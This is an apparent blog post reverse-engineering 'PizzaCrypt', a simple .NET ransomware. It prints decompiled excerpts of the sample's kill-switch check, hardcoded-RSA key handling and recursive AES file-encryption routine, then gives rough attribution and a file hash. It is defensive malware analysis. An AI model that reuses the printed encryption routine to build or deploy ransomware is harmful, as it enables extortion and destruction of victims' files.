Skip to main content
PizzaCrypt Analysis

PizzaCrypt Analysis

Malware ransomware .NET RE


I was scrolling through twitter when I saw this post from @siri_urz:

As a fan of goofy ransomware, I couldn’t resist looking at this. Obviously this isn’t some sick APT malware but I’ve been meaning to write-up more stuff and this seemed like a good exercise. It’s a non-obfuscated .NET application so the “RE” process should be pretty quick! I’ve included the binary and all decompiled source on my GitHub.

In 2019 another ransomware program PizzaCrypts1 did the rounds, but this appears to be unrelated.

Technical Analysis

Examining Main the first thing that stands out is a kill-switch, which checks for the presence of "C:\\protect.dat" and will cease execution if found.

bool flag = File.Exists("C:\\protect.dat");
if (flag) {

We then proceed onto another flag check, this time confirming if g is supplied as an argument. In that case it will set the global variablesProgram.PersonalID and Program.KeyHash to the values stored in and pi.zza respectively.

bool flag2 = args.Length != 0 && args[0] == "g";
if (flag2) {
	Program.PersonalID = File.ReadAllBytes(
						 Environment.SpecialFolder.ApplicationData), ""));

	Program.KeyHash = File.ReadAllBytes(
					  Environment.SpecialFolder.ApplicationData), "pi.zza"));

Then we get to the meat of the ransomware, the encryption/decryption routine. It’s realtively simple and makes use of a hardcoded key. This is presumably becuase the operator has the private key and will use that to decrypt in the end. It is important to note that no new key is actually generated here.

byte[] key = Program.GenerateSalt(64);
GCHandle gchandle = GCHandle.Alloc(key, GCHandleType.Pinned);
using (RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider())
	rsacryptoServiceProvider.ImportParameters(new RSAParameters
		Modulus = Convert.FromBase64String(
		Exponent = Convert.FromBase64String("AQAB") // 65537
	Program.PersonalID = rsacryptoServiceProvider.Encrypt(key, false);
	Program.KeyHash = SHA256.Create().ComputeHash(key);

After the RSA object has been setup, it writes to those files we talked about earlier which store this specific instance’s keys.

Program.ZeroMemory(gchandle.AddrOfPinnedObject(), array.Length);
File.WriteAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), ""), Program.PersonalID);
File.WriteAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "pi.zza"), Program.KeyHash);
Process.Start(Application.ExecutablePath, "g");

Lastly, we see the actual encryption routine. It recurses through the file system and encrypts each file using the key set above. It also adds the .pizza extension to all the files that it encrypted.

private static void EncryptFile(string file, byte[] password)
			using (FileStream fileStream = new FileStream(file + ".pizza", FileMode.Create))
				using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
					byte[] array = Program.GenerateSalt(32);
					fileStream.Write(array, 0, array.Length);
					Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(password, array, 3);
					rijndaelManaged.KeySize = 256;
					rijndaelManaged.BlockSize = 128;
					rijndaelManaged.Padding = PaddingMode.PKCS7;
					rijndaelManaged.Mode = CipherMode.CFB;
					rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
					rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
					using (CryptoStream cryptoStream = new CryptoStream(fileStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
						using (FileStream fileStream2 = new FileStream(file, FileMode.Open))
							byte[] array2 = new byte[10485760];
							int count;
							while ((count = fileStream2.Read(array2, 0, array2.Length)) > 0)
								cryptoStream.Write(array2, 0, count);

The decryption routine for this program is exactly the same but makes use of the private key. Overall, there really isn’t much to this ransomware.

Where did this sample come from?

One of the strings that really sticks out in this binary is the source path: “C:\Users\Костя\source\repos\”. After searching for other submissions that might feature the same info, we come across some very interesting results. We can see that this build path is found in quite a few other samples:

  • EliteVirusGenerator.exe
  • Crapsomware.exe
  • not a viruz.exe
  • /freecsgodownloadnovirus/

These all seem like they were written in jest, which tracks with PizzaCrypt. There really isn’t any major concern here - was mostly just an interesting exercise in quick and dirty RE with some rough attribution.


File Name SHA256
1.exe a0aafb46fcdbc528925dea8783fa348bb1df49fa4ff216136f32d708d7605b6f